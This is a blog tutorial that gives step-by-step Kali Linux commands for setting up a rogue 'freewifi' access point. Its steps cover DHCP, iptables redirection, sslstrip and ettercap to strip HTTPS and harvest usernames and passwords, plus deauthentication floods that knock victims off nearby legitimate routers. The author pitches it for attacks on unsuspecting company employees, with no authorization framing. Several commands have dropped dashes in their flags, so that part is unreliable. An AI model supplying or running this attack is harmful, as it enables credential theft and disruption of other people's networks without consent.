Saturday, January 28, 2017
Kali Linux Tutorial Manually Creating a Fake AP to Capture Website Logins
Kali Linux Tutorial Manually Creating a Fake AP to Capture Website Logins
Well be setting up a fake access point where well be stripping the encryption of sites using HTTPS to HTTP so we can grab the inputs of the username and password fields. Well also be sending deauthentication packets to all other routers nearby rendering them useless and forcing the user to log into our malicious access point. This can easily be used for attacks known as"waterhole attacks" where you attack a company where the employees dont even notice they are on an malicious AP because it automatically connected to the malicious one due to the other ones being shutdown.
Note: Yes, I do realize some sites are utilizing TLS, so well not be able to capture the logins of those sites unfortunately as the encryption mechanism will not be decrypted. (if you know a way to strip the encryption, please tell me!)
Requirements and Lab:
- Kali Linux, If you have no idea about Kali Linux then i recommend you to read this article: An Introduction To Hackers OS: Kali Linux Setup Tutorial.
- A network adapter that supports packet injection, monitor mode and master mode.
- Exposure to the Linux environment and a decent amount of wireless penetration experience, Read this tutorial: Kali Linux Tutorial: Wireless Auditing with Aircrack-ng, Reaver, and Pixiewps
- A functional brain that can process information.
Also Read: Easy Steps to Create Web Penetration Testing Lab in Kali Linux
Step 1: Get our default gateway
Code: [Select]
route -n
Step 2: Now lets install DHCP3-server
Code: [Select]
apt-get dist-upgrade
When that is done, now lets install DHCP server by typing:
Code: [Select]
apt-get install dhcp3-server
Now when its done installing, we need to configure the DHCP server by typing:
Code: [Select]
nano /etc/dhcpd.conf
Now, copy and paste the following in:
Code: [Select]
Authoritative;
Default-lease-time 600;
Max-lease-time 7200;
Subnet 192.168.1.0 netmask 255.255.255.0 {
Option routers 192.168.1.1;
Option subnet-mask 255.255.255.0;
Option domain-name freewifi;
Option domain-name-servers 192.168.1.1;
Range 192.168.1.2 192.168.1.40;
}
The only thing youll need to understand here is the Option domain-name line, where it says "freewifi", you may change that to whatever you want to call your fake (and malicious) access point. For this tutorial, Ill just keep it as freewifi.
Now, just save that by typing CTRL + X and then Y then enter.
Step 3: Now lets begin monitor mode
To begin monitor mode, type:
Code: [Select]
airmon-ng start <wireless interface>
Then to attempt to prevent any issues, type:
Code: [Select]
airmon-ng check kill
Step 4: Begin the fake access point
Now that you have monitor mode all set up, now lets begin the fake access point:
Code: [Select]
airbase-ng -c 11 -e <fake AP name> <monitor mode>
Now you have began the fake AP, however, if you attempt to access it, you wont be able to. Remember to not close that terminal as you need it to be online.
Step 5: Now lets set up the IP table rules
There are a lot of commands here, so I suggest setting up a shell script, and this is how you do it, first type:
Code: [Select]
nano iptables.sh
Now assuming you have basic knowledge of networking, I assume youll read over this and manually configure some of it as some of it might not work for you.
Code: [Select]
#!/bin/sh
clear
ifconfig at0 192.168.1.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables t nat A PREROUTNG p udp j DNAT to <GATEWAY IP HERE>
iptables P FORWARD ACCEPT
iptables --append FORWARD -in-interface at0 j ACCEPT
iptables --table nat -append POSTROUTING --out-interface eth0 j MASQUERADE
iptables t nat A PREROUTING p tcp destination-port 80 j REDIRECT to-port 10000
Then give it permissions by typing:
Code: [Select]
chmod +x iptables.sh
Then just run it by typing:
Code: [Select]
./iptables.sh
Step 6: Starting the DHCP server
To do this, simply type in:
Code: [Select]
dhcpd cf /etc/dhcpd.conf pf /var/run/dhcpd.pid at0
Then to start it, type:
Code: [Select]
/etc/init.d/isc-dhcp-server start
Step 7: Starting SSLSTRIP and Ettercap
I suggest you to read my previous tutorial about Ettercap: Man In The Middle Attack Using Ettercap In Kali Linux
I assume you know what both of these tools are doing, so lets start of by starting SSLSTRIP:
Code: [Select]
sslstrip f p k 10000
Leave that terminal open. Then to begin ettercap, type:
Code: [Select]
ettercap p u T q I at0
Step 8: Sending Deauth packets to all other routers
Firstly, begin scanning for the routers by typing:
Code: [Select]
airodump-ng <monitor mode>
Then, select your target and write down their channel number(s) and BSSID(s). Then set the channels by typing:
Code: [Select]
iwconfig <monitor mode> channel <Ch. Number>
Now, to begin the deauthentication attack, type the following command:
Code: [Select]
aireplay-ng -0 5000 -a <BSSID> <monitor mode> --ignore-negative-one
Congrats, you are done, Now just sit back and wait for the users to log in and gather their data.
Credits: queryFrequency
Recommended Web Hacking Tutorials:
- Kali Linux Tutorial: How To Brute Force Wordpress Using Wpscan Tool
- How to Hack Website Using Sql Map in Kali Linux - Sql Injection
- Kali Linux Tutorial: Find Vulnerabilities for Any Website Using Nikto
- Heartbleed Attack: Exploiting OpenSSL Vulnerability Using Metasploit
- Kali Linux Tutorial: Hack a Website login Page Password Using Wireshark
Available link for download